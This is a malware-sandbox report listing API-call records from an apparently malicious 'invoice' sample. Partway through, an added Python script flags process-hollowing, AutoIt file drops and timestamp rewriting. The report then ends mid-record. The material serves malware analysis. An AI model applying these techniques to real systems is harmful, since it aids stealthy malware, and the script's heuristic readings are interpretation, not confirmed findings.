                                                              • Opcode ID: 8b73a25f22315e5bf8e8c1175937d21ee089c6d2f9024ab9fd70409dd0aae28c
                                                              • Instruction ID: 61a196ee81c4128bba9c8ae4e063b24cac57805b7c535c09305a404ecaf85efb
                                                              • Opcode Fuzzy Hash: 8b73a25f22315e5bf8e8c1175937d21ee089c6d2f9024ab9fd70409dd0aae28c
                                                              • Instruction Fuzzy Hash: 4D913F7192021DAFCF04EFA4CC919EEB7B4BF19310F50442AF916AB291DB749A65CF90
                                                              APIs
                                                              • _memset.LIBCMT ref: 00263725
                                                              • GetOpenFileNameW.COMDLG32 ref: 0026376F
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                                • Part of subcall function 001F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F40C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X$t3*
                                                              • API String ID: 3777226403-2637768468
                                                              • Opcode ID: f60904f66375fb8ba1f6560f70fe1030991f5401ef9d1f194d6523184c36880f
                                                              • Instruction ID: ad9d873cc8e78f9cba7f885b76de6e8fcef8ebf7c9582d71e86bd42abdfb5250
                                                              • Opcode Fuzzy Hash: f60904f66375fb8ba1f6560f70fe1030991f5401ef9d1f194d6523184c36880f
                                                              • Instruction Fuzzy Hash: 2D21D271A1028CABCF01DFD8D845BEEBBF8AF59304F004059F509A7241DFB49A898FA1
                                                              APIs
                                                              • __getstream.LIBCMT ref: 002134FE
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00213539
                                                              • __wopenfile.LIBCMT ref: 00213549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
                                                              • Opcode ID: 0217ee083753d1dd3def675a3a636ac91854439a18244912986462edf3476e80
                                                              • Instruction ID: c29e2a13fcd754aa3290f5a5f08bcd7c2acf7d1770b3d9606ac9e12cc8ff30ee
                                                              • Opcode Fuzzy Hash: 0217ee083753d1dd3def675a3a636ac91854439a18244912986462edf3476e80
                                                              • Instruction Fuzzy Hash: F7112770A20206ABDB11FF708C426EE36F2AF69750B158425E814D7181EB70CAF19FB1
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0020D28B,SwapMouseButtons,00000004,?), ref: 0020D2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0020D28B,SwapMouseButtons,00000004,?,?,?,?,0020C865), ref: 0020D2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,0020D28B,SwapMouseButtons,00000004,?,?,?,?,0020C865), ref: 0020D2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 0e5198d95d3c326e7ca3dbc75cefa520eb26a9f2e921d2c89e5a762447328414
                                                              • Instruction ID: f50f0c8415adbc4719e9fbbd4ab17c6f8bca60622086de2f2e7dc962fa1b594b
                                                              • Opcode Fuzzy Hash: 0e5198d95d3c326e7ca3dbc75cefa520eb26a9f2e921d2c89e5a762447328414
                                                              • Instruction Fuzzy Hash: 57113975A22309BFDB208FA4DC84EAF7BBCEF44744F104469E805D7151E771AE519B60
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e24000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction ID: 5ebf0eaf5f40361aadc12c6d6dbd959825100926e8361a37e1d6678c77d5b6e2
                                                              • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                              • Instruction Fuzzy Hash: 2562F830A14218DBEB24CFA4D851BDEB372FF58304F1091A9D10DEB294E77A9E81CB59
                                                              APIs
                                                                • Part of subcall function 001F4517: _fseek.LIBCMT ref: 001F452F
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C65D
                                                                • Part of subcall function 0023C56D: _wcscmp.LIBCMT ref: 0023C670
                                                              • _free.LIBCMT ref: 0023C4DD
                                                              • _free.LIBCMT ref: 0023C4E4
                                                              • _free.LIBCMT ref: 0023C54F
                                                                • Part of subcall function 00211C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00217A85), ref: 00211CB1
                                                                • Part of subcall function 00211C9D: GetLastError.KERNEL32(00000000,?,00217A85), ref: 00211CC3
                                                              • _free.LIBCMT ref: 0023C557
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction ID: eb4f7f599b906b13658bdabb51fe04a91a9c4ca6f560d2dfbe8119e3d601955f
                                                              • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                              • Instruction Fuzzy Hash: A8514DF1914219AFDF249F64DC81BAEBBB9EF48300F1000AEF259B3251DB715A908F59
                                                              APIs
                                                              • _memset.LIBCMT ref: 0020EBB2
                                                                • Part of subcall function 001F51AF: _memset.LIBCMT ref: 001F522F
                                                                • Part of subcall function 001F51AF: _wcscpy.LIBCMT ref: 001F5283
                                                                • Part of subcall function 001F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F5293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0020EC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0020EC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00263C88
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: f4a1762fdf743ddb221d0b341f5ff343b5e90f0a361401208c05fd58e5751533
                                                              • Instruction ID: ef8ca7a81fb94b08872c7827eb71e0ca1be0871b82a44a11745afb7f54e717a5
                                                              • Opcode Fuzzy Hash: f4a1762fdf743ddb221d0b341f5ff343b5e90f0a361401208c05fd58e5751533
                                                              • Instruction Fuzzy Hash: B721C5705147849FEB32DB289859BE6BBFC9B51308F04048EE68E66182C3B52AD48B51
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0023C72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0023C746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: f0caf3491f46a2526d1ac18126b0bba139a0b0b5d56716ac860046691acfebf0
                                                              • Instruction ID: 912dab5ffde9a430102735cb2c1891de596ec2b3ee8049fd60c028392962e8d0
                                                              • Opcode Fuzzy Hash: f0caf3491f46a2526d1ac18126b0bba139a0b0b5d56716ac860046691acfebf0
                                                              • Instruction Fuzzy Hash: 6AD05E7154030EABDB50AB90EC0EF8AB77C9B00704F0001A07A54A50B3DAB0E6DA8B54
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f0b8513caa3f2d41ae67c750dae2d659a46bd067b3ae8a20779516c425b2c467
                                                              • Instruction ID: 532518a4a399b72d99d0ba545720176449872f07a39d74056e2387fd82bdbf38
                                                              • Opcode Fuzzy Hash: f0b8513caa3f2d41ae67c750dae2d659a46bd067b3ae8a20779516c425b2c467
                                                              • Instruction Fuzzy Hash: 0CF16771A183019FC714DF24C985B6AB7E5FF88314F10892EF9999B292DB70E915CF82
                                                              APIs
                                                              • _memset.LIBCMT ref: 001F5022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F50CB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: c845a42b145ab4d67cd062af74077c79a35b523f0ef59775c0fe360782be64cc
                                                              • Instruction ID: f3506b3ae44bbef97a171d62d651073156642c58eebd5e183b3ffc6d2b78227d
                                                              • Opcode Fuzzy Hash: c845a42b145ab4d67cd062af74077c79a35b523f0ef59775c0fe360782be64cc
                                                              • Instruction Fuzzy Hash: 63318EB1504705DFC721EF24E8556ABBBE4FF48308F000A2EF69E82241EB716994CB92
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00213973
                                                                • Part of subcall function 002181C2: __NMSG_WRITE.LIBCMT ref: 002181E9
                                                                • Part of subcall function 002181C2: __NMSG_WRITE.LIBCMT ref: 002181F3
                                                              • __NMSG_WRITE.LIBCMT ref: 0021397A
                                                                • Part of subcall function 0021821F: GetModuleFileNameW.KERNEL32(00000000,002B0312,00000104,00000000,00000001,00000000), ref: 002182B1
                                                                • Part of subcall function 0021821F: ___crtMessageBoxW.LIBCMT ref: 0021835F
                                                                • Part of subcall function 00211145: ___crtCorExitProcess.LIBCMT ref: 0021114B
                                                                • Part of subcall function 00211145: ExitProcess.KERNEL32 ref: 00211154
                                                                • Part of subcall function 00217C0E: __getptd_noexit.LIBCMT ref: 00217C0E
                                                              • RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,00000001,00000000,?,?,0020F507,?,0000000E), ref: 0021399F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: c4328da53a4e79368d8112b1a33d4901b370fa89d7dda25d56f78861b39bf5bc
                                                              • Instruction ID: 4a0c7d0248fb78a290bb5cdab313c1788d70eed1820747b8eedf5541d0ddec5a
                                                              • Opcode Fuzzy Hash: c4328da53a4e79368d8112b1a33d4901b370fa89d7dda25d56f78861b39bf5bc
                                                              • Instruction Fuzzy Hash: 1701F9353756129AE6127F24EC46BEE33D99FB1B20F200126F5059B181DFF0DDE04AA0
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0023C385,?,?,?,?,?,00000004), ref: 0023C6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0023C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0023C708
                                                              • CloseHandle.KERNEL32(00000000,?,0023C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0023C70F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 1b44b179daf96d3d6c7f9b4b6ffe97abbf80aa73c3c8e1094a9bf0e5282c3f19
                                                              • Instruction ID: 178d95023abd0321d6356d3235c9a376630620cd0772683f6e9a2ee0a5fa39be
                                                              • Opcode Fuzzy Hash: 1b44b179daf96d3d6c7f9b4b6ffe97abbf80aa73c3c8e1094a9bf0e5282c3f19
                                                              • Instruction Fuzzy Hash: E2E08632141214B7D7212F54BC0DFCA7B29AF05761F104110FB1C791E097B125619B98
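The three records above (the CreateProcessW / Wow64GetThreadContext / ReadProcessMemory function in the 0xE24000 dump that is not backed by a PE, the GetTempPathW / GetTempFileNameW("aut") function, and the CreateFileW / SetFileTime / CloseHandle function) can be matched mechanically from the report text. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses lines in the shape of the "APIs" and "Source File" entries, keeps only a function's own calls (dropping its "Part of subcall" callees), and flags the three behaviours. The sample input is constructed from those three records. Reading the call triple as a process-hollowing prologue, and "aut" as the temp-file prefix compiled AutoIt scripts use for dropped files, is my interpretation of what the records show rather than a verdict the report states; the constant names come from the Win32 headers.

```python
"""Added example, not Joe Sandbox code: parse report-style "APIs" entries and flag three behaviours."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the shape of the report's records; API names and hex arguments are copied
# from the three records above, nothing else is.
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00E265A3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E26639
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E2665B
• Source File: 00000002.00000002.2166684470.0000000000E24000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E24000, based on PE: false
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0023C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0023C746
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?), ref: 0023C6F2
• SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 0023C708
• CloseHandle.KERNEL32(00000000,?), ref: 0023C70F
• Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
"""

# "• Name.MODULE(args), ref: ADDR"; "Part of subcall function X:" lines are the function's callees.
API_RE = re.compile(r"^•\s+(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s+)?(?P<name>\w+)\.\w+"
                    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
PE_RE = re.compile(r"Offset:\s+(?P<off>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>true|false)")
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

@dataclass
class Call:
    name: str
    args: list[str]
    subcall: bool

@dataclass
class Record:
    calls: list[Call] = field(default_factory=list)
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None  # "based on PE: false": code in memory not backed by a file on disk
    def direct(self) -> list[Call]:
        return [c for c in self.calls if not c.subcall]  # the function's own calls only

def parse_records(text: str) -> list[Record]:
    records: list[Record] = []
    cur: Optional[Record] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # each "APIs" header opens a new function record
            cur = Record()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            args = m.group("args")
            cur.calls.append(Call(m.group("name"), args.split(",") if args else [], m.group("sub") is not None))
        elif (m := PE_RE.search(line)):
            cur.offset, cur.pe_backed = int(m.group("off"), 16), m.group("pe") == "true"
    return records

def is_hollowing_prologue(rec: Record) -> bool:
    """CreateProcess -> (Wow64)GetThreadContext -> ReadProcessMemory issued from memory not backed
    by a PE: the opening moves of a process-hollowing loader (0x10007 above is x86 CONTEXT_FULL)."""
    if rec.pe_backed is not False:
        return False
    names, pos = [c.name for c in rec.direct()], 0
    for want in ("CreateProcessW", "GetThreadContext", "ReadProcessMemory"):
        hit = next((i for i in range(pos, len(names)) if names[i].endswith(want)), None)
        if hit is None:
            return False
        pos = hit + 1
    return True

def autoit_temp_prefix(rec: Record) -> Optional[str]:
    """GetTempFileNameW(dir, prefix, 0, out) creates <dir>\\<prefix>XXXX.tmp; 'aut' is the prefix
    compiled AutoIt scripts use for the files they drop (cf. the report's AutoIt verdict)."""
    hits = [c.args[1] for c in rec.direct() if c.name == "GetTempFileNameW" and len(c.args) > 1]
    return next((p for p in hits if p != "?"), None)

def timestamp_rewrite(rec: Record) -> Optional[dict]:
    """CreateFileW for write, then SetFileTime on that handle: the file's timestamps are being
    replaced (AutoIt FileSetTime/FileInstall do this). Returns the decoded open, or None."""
    direct = rec.direct()
    for i, c in enumerate(direct):
        if c.name == "CreateFileW" and any(d.name == "SetFileTime" for d in direct[i + 1:]):
            acc, shr, _sa, disp, flg = [int(a, 16) if a != "?" else None for a in (c.args + ["?"] * 6)[1:6]]
            info = {"access": [n for b, n in ACCESS.items() if acc and acc & b],
                    "share": [n for b, n in SHARE.items() if shr and shr & b],
                    "disposition": DISPOSITION.get(disp, "?"), "attributes_normal": flg == 0x80}
            if "GENERIC_WRITE" in info["access"]:
                return info
    return None

if __name__ == "__main__":
    for r in parse_records(SAMPLE_REPORT):
        print(hex(r.offset), is_hollowing_prologue(r), autoit_temp_prefix(r), timestamp_rewrite(r))
```

Run as a script it prints one line per record; on a full report, feed the whole page text to parse_records and direct() keeps a callee's RtlFreeHeap or GetLastError from being attributed to its caller. Two practical points follow from the decoded arguments: GetTempFileNameW with uUnique 0 creates the file, so the aut*.tmp path already exists when CreateFileW opens it with OPEN_EXISTING, and the subsequent SetFileTime means the dropped file's timestamps should be checked against the drop time rather than trusted.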
                                                              APIs
                                                              • _free.LIBCMT ref: 0023BB72
                                                                • Part of subcall function 00211C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00217A85), ref: 00211CB1
                                                                • Part of subcall function 00211C9D: GetLastError.KERNEL32(00000000,?,00217A85), ref: 00211CC3
                                                              • _free.LIBCMT ref: 0023BB83
                                                              • _free.LIBCMT ref: 0023BB95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction ID: eabafb047efb3a0ad5b8a02f14c8cc96adb625c12d90b52170ddba6322045244
                                                              • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                              • Instruction Fuzzy Hash: 16E0C2E122074242CA206D386E44FF763CC0F04310B04080EBA19E314ACF30E8B088E4
                                                              APIs
                                                                • Part of subcall function 001F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001F24F1), ref: 001F2303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001F25A1
                                                              • CoInitialize.OLE32(00000000), ref: 001F2618
                                                              • CloseHandle.KERNEL32(00000000), ref: 0026503A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 3815369404-0
                                                              • Opcode ID: 53e26858eaf5611d292fe345cde7b6b3b1b41441ce952ef7219dbe9d6463f7c6
                                                              • Instruction ID: d2dc0a4fa915a43546fe28577ea1e33844dd1de80673443759539164ce1b4798
                                                              • Opcode Fuzzy Hash: 53e26858eaf5611d292fe345cde7b6b3b1b41441ce952ef7219dbe9d6463f7c6
                                                              • Instruction Fuzzy Hash: 1671DEB48112A58BC714EF6AB8B84A5BBE4FB993447E043AED909C73B2DB304474CF54
                                                              APIs
                                                              • _strcat.LIBCMT ref: 002508FD
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • _wcscpy.LIBCMT ref: 0025098C
                                                              Memory Dump Source
